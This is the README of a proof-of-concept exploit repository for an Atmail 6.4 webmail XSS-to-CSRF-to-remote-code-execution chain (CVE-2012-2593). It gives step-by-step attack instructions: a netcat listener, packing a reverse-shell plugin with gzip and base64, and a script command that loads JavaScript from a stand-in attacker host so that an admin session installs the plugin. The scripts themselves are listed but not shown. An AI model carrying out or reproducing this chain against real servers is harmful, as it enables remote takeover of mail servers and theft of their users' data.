Atmail XSS-CSRF-RCE Exploit Chain
# Atmail XSS-CSRF-RCE Exploit Chain PoC
atmail-rce.py: Exploits CVE-2012-2593 in Atmail's webmail interface.
atmail-csrf.js: Javascript file which leverages CVE 2012-2593 into a CSRF
to install a malicious plugin which executes a reverse shell
Plugin.php: Atmail plugin to be installed which calls a reverse shell
**!!Only use against servers on which you have permission to test**
## Summary
Atmail email server version 6.4 has a XSS vulnerability in both the *Date* email header
and the *Email Body* (via iFrame injection). This is leveraged into a CSRF using the
javascript XHR api to send a request with the admin user's cookie to the admin webpanel,
installing a malicious Plugin which executes code for a reverse shell.
## Proof of Concept
1. Start a netcat listener
`nc -lvp 4444`
2. Open Plugin.php and change the IP address and Port to that of your netcat listener
3. compress Plugin using gzip and encode in base64
`gzip -c Plugin.php | base64 | tr -d [:space:]`
4. Copy and Paste the above output into the atmail-csrf.js data variable
5. Run the atmail-rce.py script
`python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/ `
6. Wait until the admin user logs into their email
## Caveats
* Only works if target of XSS is an admin user of Atmail
* Only works if target is signed in to both the webmail interface and the admin interface of the server
* Only works if plugin installation is allowed on the server (on by default)
[4.0K] /data/pocs/62b5f3d197d411b7a65d5ff073822798fee03b96
├── [5.2K] atmail-csrf.js
├── [5.3K] atmail-rce.py
├── [ 754] Plugin.php
└── [1.5K] README.md
0 directories, 4 files
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